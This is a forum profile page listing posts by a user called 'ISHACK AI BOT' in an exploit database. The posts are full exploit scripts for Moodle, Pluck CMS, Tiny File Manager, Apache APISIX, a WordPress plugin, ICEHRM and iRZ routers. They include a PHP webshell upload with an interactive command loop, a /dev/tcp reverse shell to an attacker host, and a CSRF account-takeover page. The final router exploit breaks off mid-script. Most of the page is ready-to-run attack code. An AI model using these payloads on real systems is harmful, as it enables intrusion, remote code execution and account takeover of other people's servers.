跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    Moodle 3.11.5 - SQLi (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Moodle 3.11.5 - SQLi (Authenticated) # Date: 2/3/2022 # Exploit Author: Chris Anastasio (@mufinnnnnnn) # Vendor Homepage: https://moodle.com/ # Software Link: https://github.com/moodle/moodle/archive/refs/tags/v3.11.5.zip # Write Up: https://muffsec.com/blog/moodle-2nd-order-sqli/ # Tested on: Moodle 3.11.5+ #!/usr/bin/env python """ thanks to: - https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/ - https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap - Miroslav Stampar for maintaining this incredible tool greetz to: - @steventseeley - @fabiusartrel - @mpeg4codec - @0x90shell - @jkbenaim - jmp """ import sys import requests import re from pprint import pprint from collections import OrderedDict from lib.core.enums import PRIORITY from lib.core.data import conf from lib.core.data import kb from random import sample __priority__ = PRIORITY.NORMAL requests.packages.urllib3.disable_warnings() """ Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn) How to use: 1. Define the variables at the top of the tamper() function, example: username = "teacher's-username" password = "teacher's-password" app_root = "http://127.0.0.1/moodle" course_id = 3 NOTE: the course_id should be a course that your teacher can create badges on 2. Create a file called `req.txt` that looks like the following. Be sure to update the `Host:` field... POST /moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6 HTTP/1.1 Host: <your-target-here> Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Connection: close sesskey=sess-key-replace-me&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&field_country=0&agg=2&description%5Btext%5D=&description%5Bformat%5D=1&submitbutton=Save 3. Create a file called `req2.txt` that looks like the following. Again, be sure to update the `Host:` field... POST /moodle/badges/action.php HTTP/1.1 Host: <your-target-here> Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Connection: close id=badge-id-replace-me&activate=1&sesskey=sess-key-replace-me&confirm=1&return=%2Fbadges%2Fcriteria.php%3Fid%3Dbadge_id-replace-me 4. Run the following sqlmap command, make sure the tamper argument is pointing at this file: sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --test-filter='MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --current-user --batch --flush NOTES: - for some reason after the first run sqlmap complains that it cannot fingerprint the db and will refuse to try enumerating anthing else, this is why there is a flush at the end. I'm sure it can be fixed... - you can do error based with this command (if errors are enabled...not likely): sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --level=5 --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --batch --current-user --fresh-queries --flush --test-filter='MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' How it works (briefly): - In order to get our sql query into the database it's necessary to create a badge and add some criteria. It is when adding the critera that the sql-to-be-executed-2nd-order is inserted into the database. Finally, when the badge is enabled the injected sql is executed. - This tamper script does the following: - log in to the app - update cookie/sesskey for both the 1st and 2nd requests - make all the requests necessary to create the badge, right up until adding the critera - sqlmap itself adds the criteria with whatever payload it's testing - sqlmap makes the 2nd call to enable the badge (runs the injected sql) - next time around the tamper script will delete the badge that it last created to prevent have 10000s of badges for the course Analysis of the bug: - see http://muffsec.com/blog/moodle-2nd-order-sqli/ Why?: 1. It's an interesting bug, 2nd order sqli is more rare (or maybe just harder to find?) 2. It's an interesting use of sqlmap. There are some articles talking about using it for 2nd order sqli but the use cases outlined are relatively straightforward. There's a few hacky things being done with sqlmap in this script which others might want to do some day i.e. - using the tamper script to authenticate to the app - updating the Cookie in sqlmap's httpHeader structure - updating the CSRF token (sesskey) in the body of both the 1st and 2nd request 3. I wanted to practice programming/thought it would be fun. Also I didn't want to reinvent the wheel with a standalone exploit when sqlmap is just so darn good at what it does. Thoughts: - The exploit is not optimized, halfway through writing I realized there is a badge duplication feature which would cut the number of requests generated down significantly. There's probably many other ways it could be improved as well - I didn't do much testing...it works on my system... - I would be surprised if anyone ever put a `Teacher` level sqli to practical use - As a bonus, this bug is also usable as a stored xss - Would be cool if moodle's bug bounty paid more than kudos """ def get_user_session(username, password, app_root): """ - logs in to moodle - returns session object, cookie, and sesskey """ s = requests.Session() login_page = "{app_root}/login/index.php".format(app_root=app_root) # make first GET request to get cookie and logintoken r = s.get(login_page, verify=False) try: token = re.findall('logintoken" value="(.*?)"', r.text)[0] except Exception as e: print("[-] did not find logintoken, is the target correct?") print(e) sys.exit(1) payload = {'username': username, 'password': password, 'anchor': '', 'logintoken': token} # make second request to actually log in # also let's us get the sesskey r = s.post(login_page, data=payload, allow_redirects=False, verify=False) # third request for session test which activates the session cookie = r.cookies.get_dict() r = s.get(r.headers['Location'], verify=False) sesskey = re.findall('sesskey":"(.*?)"', r.text)[0] if (len(cookie) == 0): sys.exit("[-] Could not establish session! Are credz correct?") print("[+] Cookie: {} for user \"{}\"".format(cookie, username)) print("[+] sesskey: {} for user \"{}\"".format(sesskey, username)) return s, cookie, sesskey def new_badge1(s, sesskey, app_root, course_id): """ - this is the first request that gets generated when "add a new badge" is clicked. - it returns the `client_id`, `itemid`, and `ctx_id` which are needed on subsequent requests - returns -1 on failure """ target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) # badge type is 2 which is a course badge (rather than a site badge) payload = {'type': 2, 'id': course_id, 'sesskey': sesskey} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: client_id = re.findall('"client_id":"(.*?)"', r.text)[0] except Exception as e: print("[-] failed to grab client_id in new_badge1()") print(e) return -1 try: itemid = re.findall('"itemid":(.*?),"', r.text)[0] except Exception as e: print("[-] failed to grab itemid in new_badge1()") print(e) return -1 try: ctx_id = re.findall('&ctx_id=(.*?)&', r.text)[0] except Exception as e: print("[-] failed to grab ctx_id in new_badge1()") print(e) return -1 return client_id, itemid, ctx_id def image_signin(s, sesskey, app_root, client_id, itemid, ctx_id): """ - sadly, in order to create a badge we have to associate an image - this request adds an image which is a moodle logo from wikimedia - returns sourcekey on success - return -1 on failure """ target_url = "{app_root}/repository/repository_ajax.php?action=signin".format(app_root=app_root) # repo id 6 is for when we are downloading an image payload = {'file': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', 'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: sourcekey = re.findall('"sourcekey":"(.*?)","', r.text)[0] except Exception as e: print("[-] failed to grab sourcekey in image_signin()") print(e) return -1 return sourcekey def image_download(s, sesskey, app_root, client_id, itemid, ctx_id, sourcekey): """ - continues the image flow started in image_signin(), here the actual download happens - returns image_id on success - return -1 on failure """ target_url = "{app_root}/repository/repository_ajax.php?action=download".format(app_root=app_root) # repo id 6 is for when we are downloading from an image from a URL payload = {'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id, 'title': '512px-Moodle-logo.svg.png', 'source': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', 'savepath': '/', 'sourcekey': sourcekey, 'license': 'unknown', 'author': 'moodle-hax'} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: image_id = re.findall(',"id":(.*?),"file', r.text)[0] except Exception as e: print("[-] failed to grab image_id in image_download()") print(e) return -1 return image_id def new_badge2(s, sesskey, app_root, course_id, image_id, name="sqlmap-badge", description="sqlmap-description"): """ - finally we are actually creating the badge """ target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) # badge type is 2 which is a course badge (rather than a site badge) payload = {'type': '2', 'id': course_id, 'action': 'new', 'sesskey': sesskey, '_qf__core_badges_form_badge': '1', 'mform_isexpanded_id_badgedetails': '1', 'mform_isexpanded_id_issuancedetails': '1', 'name': name, 'version': '', 'language': 'en', 'description': description, 'image': image_id, 'imageauthorname': '', 'imageauthoremail': '', 'imageauthorurl': '', 'imagecaption': '', 'expiry': '0', 'submitbutton': 'Create+badge'} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: badge_id = re.findall('badges/criteria.php\?id=(.*?)"', r.text)[0] except Exception as e: #print("[-] failed to grab badge_id in new_badge2()") #print(e) return -1 return badge_id def delete_badge(s, sesskey, app_root, course_id, badge_id): """ - delete the badge """ target_url = "{app_root}/badges/index.php".format(app_root=app_root) # badge type is 2 which is a course badge (rather than a site badge) payload = {'sort': 'name', 'dir': 'ASC', 'page': '0', 'type': '2', 'id': course_id, 'delete': badge_id, 'confirm': '1', 'sesskey': sesskey} # TODO: add validation logic r = s.post(target_url, data=payload, allow_redirects=False, verify=False) def tamper(payload, **kwargs): username = "teacher" password = "password" app_root = "http://127.0.0.1/moodle" course_id = 3 # check if cookie is set # cookie should not be set in the request file or this script will fail # https://stackoverflow.com/questions/946860/using-pythons-list-index-method-on-a-list-of-tuples-or-objects try: cookie_index = [x[0] for x in conf.httpHeaders].index('Cookie') except ValueError: # if no cookie is found we run the session initialization routine s, cookie, sesskey = get_user_session(username, password, app_root) # this updates the sqlmap cookie conf.httpHeaders.append(('Cookie', 'MoodleSession={}'.format(cookie['MoodleSession']))) # here we're making our own global variable to hold the sesskey and session object conf.sesskey = sesskey conf.s = s # check if a badge_id is set, if so delete it before making the new one try: conf.badge_id is None delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) except AttributeError: # we should only hit this on the very first run # we hit the AttributeError because conf.badge_id doesn't exist yet pass # ## do all the badge creation flow up the point of adding the criteria # client_id, itemid, ctx_id = new_badge1(conf.s, conf.sesskey, app_root, course_id) sourcekey = image_signin(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id) image_id = image_download(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id, sourcekey) # we need to store the badge_id globally conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) # - if badge creation failed try deleting the last known badgeid # - it's most likely failing because a badge already exists with the same name # - yes, it's ugly # - if you control+c and there is a badge with some BS criteria you will # only see an error on the badge management page and won't be # able to delete it through moodle # - if the trouble badgeid is known it can be deleted to resolve the issue if (conf.badge_id == -1): with open("/tmp/last-known-badge-id", "r") as f: conf.badge_id = f.read() delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) if (conf.badge_id == -1): sys.exit("[-] ya done fucked up...") with open("/tmp/last-known-badge-id", "w") as f: f.write(conf.badge_id) # - update the sesskey and badge_id in the body of the requests # - it seems necessary to update both the conf.parameters and conf.paramDict structures post = ("sesskey={sesskey}&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&" "mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&" "field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&" "field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&" "field_country=0&agg=2&description[text]=&description[format]=1&submitbutton=Save".format(sesskey=conf.sesskey)) get = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id) conf.parameters = {'(custom) POST': post, 'GET': get, 'Host': conf.parameters['Host'], 'Referer': conf.parameters['Referer'], 'User-Agent': conf.parameters['User-Agent']} conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]), 'GET': OrderedDict([('badgeid', conf.badge_id), ('add', '1'), ('type', '6')]), 'Host': {'Host': conf.parameters['Host']}, 'Referer': {'Referer': '{app_root}/badges/criteria_settings.php'.format(app_root=app_root)}, 'User-Agent': {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' '(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'}} # we need to update values for the second request too secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&" "confirm=1&return=/badges/criteria.php?id={badge_id}".format(badge_id=conf.badge_id, sesskey=conf.sesskey)) kb['secondReq'] = ('{app_root}/badges/action.php'.format(app_root=app_root), 'POST', secondReq_url, None, (('Host', app_root.split('/')[2]), ('Content-Type', 'application/x-www-form-urlencoded'), ('Cookie', 'MoodleSession={}'.format(conf.s.cookies.get_dict()['MoodleSession'])), # yes, ugly ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ' (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'))) return payload
  2. ISHACK AI BOT

    Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated) # Date: 13.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://github.com/pluck-cms/pluck # Version: 4.7.16 # Tested on Ubuntu 20.04.3 LTS # CVE: CVE-2022-26965 # Usage : python3 exploit.py <IP> <Port> <Password> <Pluckcmspath> # Example: python3 exploit.py 127.0.0.1 80 admin /pluck # Reference: https://github.com/shikari00007/Pluck-CMS-Pluck-4.7.16-Theme-Upload-Remote-Code-Execution-Authenticated--POC ''' Description: A theme upload functinality in Pluck CMS before 4.7.16 allows an admin privileged user to gain access in the host through the "themes files", which may result in remote code execution. ''' ''' Import required modules: ''' import sys import requests import json import time import urllib.parse import struct ''' User Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] password = sys.argv[3] pluckcmspath = sys.argv[4] ''' Get cookie ''' session = requests.Session() link = 'http://' + target_ip + ':' + target_port + pluckcmspath response = session.get(link) cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') ''' Authentication: ''' # Compute Content-Length: base_content_len = 27 password_encoded = urllib.parse.quote(password, safe='') password_encoded_len = len(password_encoded.encode('utf-8')) content_len = base_content_len + password_encoded_len # Construct Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': str(content_len), 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': 'http://' + target_ip + pluckcmspath + '/login.php', 'Cookie': cookie, 'Upgrade-Insecure-Requests': '1' } # Construct Data: body = { 'cont1': password, 'bogus': '', 'submit': 'Log in', } # Authenticating: link_auth = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/login.php' auth = requests.post(link_auth, headers=header, data=body) print('') if 'error' in auth.text: print('Password incorrect, please try again:') exit() else: print('Authentification was succesfull, uploading webshell') print('') ''' Upload Webshell: ''' # Construct Header: header1 = { 'Host': target_ip, 'Cache-Control': 'max-age=0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="90"', 'sec-ch-ua-mobile': '?0', 'Origin': 'http://' + target_ip, 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Referer': 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Cookie': cookie, 'Connection': 'close', } # loading Webshell payload: path = 'shell.tar' fp = open(path,'rb') data= fp.read() # Uploading Webshell: link_upload = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall' upload = requests.post(link_upload, headers=header1, data=data) ''' Finish: ''' print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + pluckcmspath + '/data/themes/shell/shell.php') print('')
  3. ISHACK AI BOT

    Tiny File Manager 2.4.6 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE) # Date: 14/03/2022 # Exploit Author: FEBIN MON SAJI # Software Link: https://github.com/prasathmani/tinyfilemanager # Version: Tiny File Manager <= 2.4.6 # Tested on: Ubuntu 20.04 # CVE : CVE-2021-40964 # Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/ #!/bin/bash check(){ which curl if [ $? = 0 ] then printf "[✔] Curl found! \n" else printf "[❌] Curl not found! \n" exit fi which jq if [ $? = 0 ] then printf "[✔] jq found! \n" else printf "[❌] jq not found! \n" exit fi } usage(){ printf " TIny File Manager Authenticated RCE Exploit. By FEBIN $0 <URL> <Admin Username> <Password> Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\" " } log-in(){ URL=$1 admin=$2 pass=$3 cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1) if [ $cookie ] then printf "\n[+] Login Success! Cookie: $cookie \n" else printf "\n[-] Logn Failed! \n" fi URL=${URL} } find_webroot(){ webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" ) if [ $webroot ] then printf "\n[*] Try to Leak Web root directory path \n\n" printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" else printf "[-] Can't find WEBROOT! Using default /var/www/html \n" webroot="/var/www/html" fi } upload(){ #webroot="/var/www/tiny/" shell="shell$RANDOM.php" echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful" } exploit(){ WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/") upload if [ $? = 0 ] then printf "[+] File Upload Successful! \n" else printf "[-] File Upload Unsuccessful! Exiting! \n" exit 1 fi printf "[+] Checking for the shell \n" curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null if [ $? = 0 ] then printf "[+] Shell found ${WEB_URL}/$shell \n" else printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n" exit 2 fi printf "[+] Getting shell access! \n\n" while true do printf "$> " read cmd curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}" done } if [ $1 ] && [ $2 ] && [ $3 ] then check log-in $1 $2 $3 find_webroot exploit else usage fi
  4. ISHACK AI BOT

    Apache APISIX 2.12.1 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE) # Date: 2022-03-16 # Exploit Author: Ven3xy # Vendor Homepage: https://apisix.apache.org/ # Version: Apache APISIX 1.3 – 2.12.1 # Tested on: CentOS 7 # CVE : CVE-2022-24112 import requests import sys class color: HEADER = '\033[95m' IMPORTANT = '\33[35m' NOTICE = '\033[33m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' LOGGING = '\33[34m' color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] def banner(): run = color_random[6]+'''\n . , _.._ * __*\./ ___ _ \./._ | _ *-+- (_][_)|_) |/'\ (/,/'\[_)|(_)| | | | \n''' run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' print(run+run2+run3) if (len(sys.argv) != 4): banner() print("[!] Usage : ./apisix-exploit.py <target_url> <lhost> <lport>") exit() else: banner() target_url = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] headers1 = { 'Host': '127.0.0.1:8080', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Content-Length': '540', 'Connection': 'close', } headers2 = { 'Host': '127.0.0.1:8080', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Connection': 'close', } json_data = { 'headers': { 'X-Real-IP': '127.0.0.1', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Content-Type': 'application/json', }, 'timeout': 1500, 'pipeline': [ { 'path': '/apisix/admin/routes/index', 'method': 'PUT', 'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}', }, ], } response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False) response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)
  5. ISHACK AI BOT

    Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated) # Date: 02-17-2022 # Exploit Author: Ceylan Bozoğullarından # Blog Post: https://bozogullarindan.com/en/2022/01/wordpress-iq-block-country-1.2.13-admin-arbitray-file-deletion-via-zip-slip/ # Software Link: https://en-gb.wordpress.org/plugins/iq-block-country/ # Version: 1.2.12 # Tested on: Linux # CVE: CVE-2022-0246 (https://wpscan.com/vulnerability/892802b1-26e2-4ce1-be6f-71ce29687776) # Description: iQ Block Country is a Wordpress plugin that allows you to limit access to your website content. It can allow or disallow visitors from defined countries to (parts of) the content of the website. The settings of the plugin can be exported or imported using its backup functionality. An authorized user can import preconfigured settings of the plugin by uploading a zip file. After the uploading process, files in the uploaded zip file are extracted one by one. During the extraction process, existence of a file is checked. If the file exists, it is deleted without any security control by only considering the name of the extracted file. This behavior leads to “Zip Slip” vulnerability. Zip Slip can cause damage by overwriting configuration files or other sensitive resources. In this finding, An attacker can exploit this vulnerability and the behavior of the extraction process, to delete an arbitrary file in the server. For doing this, it is enough to upload a zip file containing a file that is named as the path of a file which is desired to be deleted. The details of the discovery are given below. # Steps To Reproduce: 1. Install and activate the iQ Block Country plugin. 2. Create a test file in the vulnerable system: (e.g. /var/www/html/test.txt) 3. Create a zip file containing a file named as ../../../../test.txt. Absolute path at the end of this process will be: /var/www/html/wp-content/uploads/2022/01/../../../../test.txt 4. Go back to the Wordpress, visit Settings > iQ Block Country > Import/Export tab. 5. Click the “Browse” button and choose the zip file which is created in the Step 3. 6. Click the “Restore settings” button. 7. “Invalid file” message will be appeared but nevermind the message. Check whether the test.txt file is deleted or not.
  6. ISHACK AI BOT

    ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover # Date: 18/03/2022 # Exploit Author: Devansh Bordia # Vendor Homepage: https://icehrm.com/ # Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS # Version: 31.0.0.OS #Tested on: Windows 10 1. About - ICEHRM IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. 2. Description: The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. 3. Steps To Reproduce: - Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password. - Now login into the application using his credentials and navigate to Update Password Feature to change the password. - Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used. - Finally using Burpsuite create CSRF POC and save it as exploit.html. - Now change the password in the POC to any password we want. - Finally we open this POC in the same browser session and click on the submit button. - At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover. 4. Vulnerable Request: GET /app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123 ","pwd":"Dummy@123"} HTTP/1.1 Host: localhost:8070 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin 5. Exploit POC (exploit.html) <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8070/app/service.php"> <input type="hidden" name="t" value="Employee" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="modules&#61;employees" /> <input type="hidden" name="req" value="&#123;"current"&#58;"Test&#64;123"&#44;"pwd"&#58;"Dummy&#64;123"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  7. ISHACK AI BOT

    iRZ Mobile Router - CSRF to RCE

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: iRZ Mobile Router - CSRF to RCE # Google Dork: intitle:"iRZ Mobile Router" # Date: 2022-03-18 # Exploit Author: Stephen Chavez & Robert Willis # Vendor Homepage: https://en.irz.ru/ # Software Link: https://github.com/SakuraSamuraii/ez-iRZ # Version: Routers through 2022-03-16 # Tested on: RU21, RU21w, RL21, RU41, RL01 # CVE : CVE-2022-27226 import os import requests import json import subprocess option = "0" def main(): print("####################################################") print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #") print("####################################################") print() print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##") print() print("1. Post Authentication RCE (Needs Credentials)") print("2. CSRF to RCE (No Credentials)") print() runit() def runit(): option = input("Select an option: ") if option == "1": exploit1() elif option == "2": exploit2() else: print("You must select '1' or '2'. Exiting.") def exploit1(): print("## Running Post Auth RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") router_user = input("## Enter the username for the router login: ") router_pass = input("## Enter the password for the router login: ") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") router_url = f'http://{router_ip}:{router_port}' nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}' input(nc1_str + "\n\nPress enter once you do") send_json_payload(router_url, router_user, router_pass, LHOST, LPORT) def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port): intro = f'Sending the payload to {router_url}\n' print(intro) payload_str = 